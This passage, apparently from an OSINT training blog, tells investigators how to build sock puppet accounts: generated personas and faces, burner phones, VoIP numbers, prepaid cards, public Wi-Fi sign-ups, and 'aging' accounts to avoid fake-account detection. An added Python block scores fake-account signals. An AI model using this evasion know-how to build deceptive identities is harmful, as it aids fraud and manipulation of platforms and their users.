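    print("inputs only:   ", link_addresses(SAMPLE_TXS, use_change=False))
    print("with change:   ", link_addresses(SAMPLE_TXS))
```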

        Investigating Bitcoin wallets and tracing transactions is a complex blend of blockchain analysis, pattern recognition, and detective work. While the public nature of the blockchain provides a transparent record of transactions, the pseudonymous identities challenge direct attribution. However, through careful analysis and sometimes additional external information, it is possible to uncover the flow of funds and potentially the parties involved.

        Cryptocurrencies represent a groundbreaking integration of cryptography, computer science, and financial principles to create a secure, decentralized, and efficient form of digital currency. Through the innovative use of blockchain technology, public ledgers, and consensus mechanisms, they offer a transparent, secure way of conducting transactions without traditional financial intermediaries. As the technology matures and adoption grows, cryptocurrencies continue to redefine the financial landscape.


        Resources

        The CSI Linux Certified OSINT Analyst (CSIL-COA)
        The CSI Linux Certified Dark Web Investigator (CSI-CDWI)

        Posted on

        Using Sock Puppet Accounts for OSINT

        ‘A sock puppet or sock puppet is an online identity used for purposes of deception. The term, a reference to the manipulation of a simple hand puppet made from a sock, originally referred to a false identity assumed by a member of an internet community who spoke to, or about, themselves while pretending to be another person.’ – Wikipedia

        These fake social media accounts are used by both sides of the cyber game. You can find hackers, scammers, bots, and other cyber criminals on the dark side, while journalists, penetration testers, and investigators are on the other. Like any decent tool, it can be used for both good and evil. Why would YOU want to create an undercover account? When investigating, it is always a good idea to separate your real identity from the initial investigation. Otherwise, you increase the likelihood that the target will get suspicious. You also run the risk of being identified and doxed, harassed, and in the absolute worst-case scenario, targeted for lethal retaliation. Depending on who the suspect is, you always need to take the appropriate countermeasures to protect your organization/agency, yourself, and even your family. Another thing to take into consideration is that many social media sites have Terms of Service (TOS) that specifically cover fake or investigation accounts. Organizations like Facebook actively look for these types of accounts, even if they belong to law enforcement, and ban them.

        !!!DO NOT USE YOUR PERSONAL OR BUSINESS ACCOUNTS TO DO INVESTIGATIONS!!!

        The Importance of Anonymity and Security

        You should connect to a public WiFi access point and only use VPN or Tor as a last resort. The reasons are that VPNs and Tor are sometimes tracked, blocked, or marked as questionable by websites when creating an account. This means the likelihood you will be able to create the account without having a real phone number decreases drastically. Public WiFi tends to look a bit more “normal”.

        More about Tor

        I love Tor and always have. Tor is great at offering some of the best anonymity available, and the best part is that it’s free. Onion routing works by passing your traffic through several different proxy servers, which minimizes the trace evidence that can be used to tie the traffic back to its original source. You can easily set up a hidden service with a “.onion” address. This allows us to communicate securely with other investigators, informants, or even suspects. The downside of using Tor is that it is commonly used by criminals, and many of the websites we need to investigate may block traffic from Tor or red-flag it. So, even though it offers a lot of benefits, Tor is not always good for Surface Web investigations.

        VPN Value?

        There has been a ton of advertising for Virtual Private Network (VPN) services that claim that they will protect your Internet traffic. This is only partly true and mostly false. A VPN is a Point-to-Point encrypted tunnel that allows one network to talk to another through an encrypted tunnel. Think of it this way. You are using a third-party VPN service; your traffic is very secure when connecting from your system to the third-party network. The traffic then routes from that server through their Internet connection. The other thousand people using the same service will also share that same gateway IP address. That sounds fine, right? Well, after you leave that service provider, your traffic is back on the Internet for everyone else to see. This means it is naturally less anonymous than Tor. The providers may also be watching everything you do in the name of “Marketing”. Free VPNs and cheaper ones are the biggest risks. The services that claim they DO NOT STORE LOGS are also usually lying or not telling you the whole truth. Within networking, there will always be logs. They are required to troubleshoot when things fail. Logs will be there; it is just a matter of how long and how they are destroyed. Some of the websites are red-flagging the popular VPN services.

        Creating a persona

        Some people build these accounts from scratch. The more content and backstory you create at the beginning, the more direction you have to make the account look like a real person’s. Use a password manager to keep track of everything you create for these accounts, including the username/password details, and keep notes. KeePassXC is a great free, cross-platform solution that lets you share your password database among multiple computers and operating systems.

        Character/Persona generators

        Creating an account can take time, effort, and creativity, and you may be short on any of those for whatever reason. Anyone who has played role-playing games like D&D, WARHAMMER, or other games where you need to generate a character has a head start, because they have done this before. There are a few resources you can leverage to speed up the process and spit out a “character” with a lot of random attributes and content. Below is a list of resources you can use when generating your sock puppet persona. Just remember that all generated information is fake; you can change the data to fit your narrative:

        • Fake Identity Generator (fakepersongenerator.com)
        • Random Name Generator (www.elfqrin.com/fakeid.php)
        • Random Character Generator (random-character.com)
        • Personality Generator (rangen.co.uk)
        • Trait Generator (rangen.co.uk)

        Image generators

        Generating images that are consistent with each other can be a challenge. You want to create a realistic person with a history and consistency. It is important to NEVER use pictures of friends or family. This can put the investigation at risk, and possibly put them at risk as well.

        • (thispersondoesnotexist.com) – GitHub project available
        • AI-Generated Faces (boredhumans.com)
        • Gallery of AI-Generated Faces (generated.photos)

        Emails

        Creating an email account is the foundation for setting up your undercover investigation account. It will be used for setting up social media accounts and for communications with suspects. Any email service will work. Here are a few:

        • GMX.com
        • Mail.com
        • Protonmail.com
        • Yandex.Mail

        Burner Phones

        A burner phone is extremely useful and may be required to create accounts on certain websites, as well as to build a history for the persona. The reason is that sites try to prevent fake accounts from being created and will send an SMS verification message to a phone; bots rarely have their own phone numbers. In some countries you do not need to tie your ID or passport to the purchase of a SIM card or burner phone. If you are in one of these countries, it is suggested to pay cash only and let the phone sit for 2+ months before you activate it with a sock puppet email. SIM cards can sometimes also be purchased on Amazon.com; keep an eye out for deals and trial offers. Phone emulators can also work.

        VoIP Phone

        Create a Voice over IP (VoIP) account with an online vendor. This adds another layer of separation. Many online services, such as Google Voice, require a real phone number to be tied to your account, which makes your burner phone that much more important.

        Pre-Paid Credit Cards and Gift Cards

        In some cases you may need a credit/debit card for purchases, account setups, and account verifications. If you are in a country or area that allows you to purchase these types of cards (VISA/Mastercard), use good OPSEC to minimize links back to you. You can also use a privacy.com masked credit card.

        Cryptocurrencies

        If your investigation requires cryptocurrencies for transactions, you can use prepaid cards on most of the crypto services. Exodus.com is a wallet that lets you trade many different currencies, and its desktop software is cross-platform. An example of needing cryptocurrencies during an investigation might be a fraud case on sites like Facebook Marketplace, Instagram’s Shop Now, Craigslist, etc. You may also find them useful when purchasing content or buying services.

        Social Media Accounts

        When creating a social media account, you want to look as ‘normal’ as possible on the website, because many sites are trying to stop people from creating fake accounts. Make sure you are not breaking the law or violating terms of service when doing this. Here are the steps to follow when creating your OSINT undercover accounts:

        1. Use public Wi-Fi and do NOT use a VPN
        2. Pick a social media site to focus on
        3. Use your persona’s “real” phone number for verification
        4. Save the information in a password manager like KeePassXC
        5. Keep Operational Security (OPSEC) in mind:
           – Use a very strong password for the password manager access
           – Use a different password for each account
           – Never cross over accounts with your real-world or personal accounts
        6. Go into the settings of the account you just created and change the phone number to a VoIP number
        7. When you are done, log out of the account
        8. Log back in and start adding information to your account relevant to the profile
        9. Go back to step 2 for the rest of the sites you want to try

        Note: You may burn undercover (UC) personas when creating accounts. Just be patient and persistent. This process takes time and effort.

        Aging the Account

        Like a fine wine or good whiskey, the account needs to be “aged”. This means creating content and history, which minimizes the likelihood of the account being flagged as fake by the service provider and deleted. Become the persona. Go to the same public Wi-Fi you created the account on to log in and generate activity. Like posts, make comments, share things, and grow your connections. Log out when you are done. This is very important and ties into OPSEC: not logging out can leak your other networks and information to the site’s data collection if you are not careful. The goal is to train the site that you are a real person by doing real-person things. Try to add content and history that follow the personality of the fake character. This includes finding banners with image searches: think of banners for your social media pages, memes, and pictures from the location your persona is from. Build your account pages the way you believe your sock puppet would have. Add enough information to make it look real. Over time, keep logging into the account and adding content to build history and the trustworthiness of the account as a “real” person.
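        Seen from the platform’s side, “aging” matters because fake-account detection leans on exactly the kind of history this paragraph describes: account age, profile completeness, how much activity exists, and whether that activity arrived in one burst or was spread over time. The following Python is an added illustration of that defender-side view; it is not code from the original article, and the account records and scoring thresholds are constructed for the example, not drawn from any real service.

```python
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class Account:
    """A constructed, simplified view of what a platform sees for one account."""
    handle: str
    age_days: float                     # days since the account was created
    posts: int                          # total posts and comments
    connections: int                    # friends / followers / contacts
    post_hours: List[float] = field(default_factory=list)  # hours after creation of each post
    profile_fields: int = 0             # how many of bio/location/avatar/banner are filled (0-4)


def risk_signals(acct: Account) -> List[str]:
    """Return the names of simple heuristics the account trips (thresholds are assumptions)."""
    signals: List[str] = []
    if acct.age_days < 7:
        signals.append("new_account")
    if acct.posts == 0 and acct.connections == 0:
        signals.append("no_history")
    if acct.profile_fields <= 1:
        signals.append("empty_profile")
    if acct.post_hours and acct.age_days >= 7:
        # Fraction of all posts made in the first day; an old account whose
        # activity is almost entirely a day-one burst looks scripted.
        burst = sum(1 for h in acct.post_hours if h <= 24) / len(acct.post_hours)
        if burst >= 0.8:
            signals.append("posting_burst")
    if acct.age_days > 0 and acct.posts / acct.age_days > 50:
        signals.append("high_velocity")
    return signals


def classify(acct: Account) -> str:
    """Map the number of tripped heuristics to a coarse triage label."""
    count = len(risk_signals(acct))
    if count >= 2:
        return "review"
    if count == 1:
        return "watch"
    return "ok"


# Constructed sample accounts (not real data).
SAMPLES: Dict[str, Account] = {
    "fresh_empty": Account("fresh_empty", age_days=1, posts=0, connections=0, profile_fields=0),
    "burst_then_quiet": Account(
        "burst_then_quiet", age_days=30, posts=40, connections=5,
        post_hours=[0.5] * 36 + [100.0, 200.0, 300.0, 400.0], profile_fields=2,
    ),
    "aged": Account(
        "aged", age_days=120, posts=60, connections=45,
        post_hours=[float(i * 48) for i in range(60)], profile_fields=4,
    ),
}


def scan_samples() -> Dict[str, str]:
    """Classify every sample and return handle -> label."""
    return {handle: classify(acct) for handle, acct in SAMPLES.items()}


if __name__ == "__main__":
    for handle, label in scan_samples().items():
        print(f"{handle:18s} {label:7s} {risk_signals(SAMPLES[handle])}")
```

        The brand-new empty account trips three heuristics at once, the account that was filled in a single burst and then abandoned still stands out a month later, and only the account with steady activity spread across its lifetime passes cleanly, which is the point of adding history gradually rather than all at once.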

        Learn from your Investigations

        ‘Operations security (OPSEC) is a process that identifies critical information to determine if friendly actions can be observed by enemy intelligence, determines if information obtained by adversaries could be interpreted to be useful to them, and then executes selected measures that eliminate or reduce adversary exploitation of friendly critical information.’ – Wikipedia

        Things always change, and you must keep improving to keep up. Make a habit of using good OPSEC. There is a saying among investigators: the suspect needs to be lucky every single time, but you only need to be lucky once. The other side can use the same Tactics, Techniques, and Procedures (TTPs) as you do, and that turns the tables on you. Now you need to be lucky every single time, and they only need to be lucky once.

        Resources

        • Creating Research Accounts for OSINT Investigations – We are OSINTCurio.us
        • Dark Side 116: Sock Puppets. What if I told you not all fake social media accounts are used maliciously?
        • DeBot: Twitter Bot Detection via Warped Correlation
        • How to Make Sock Puppet Accounts for OSINT in 2021 | Hacker Noon
        • The Art of The Sock (secjuice.com)
        • The Ultimate Sock Puppets Tutorial for OSINT Operators – Ehacking
        • Identifying Sock puppet Accounts on social media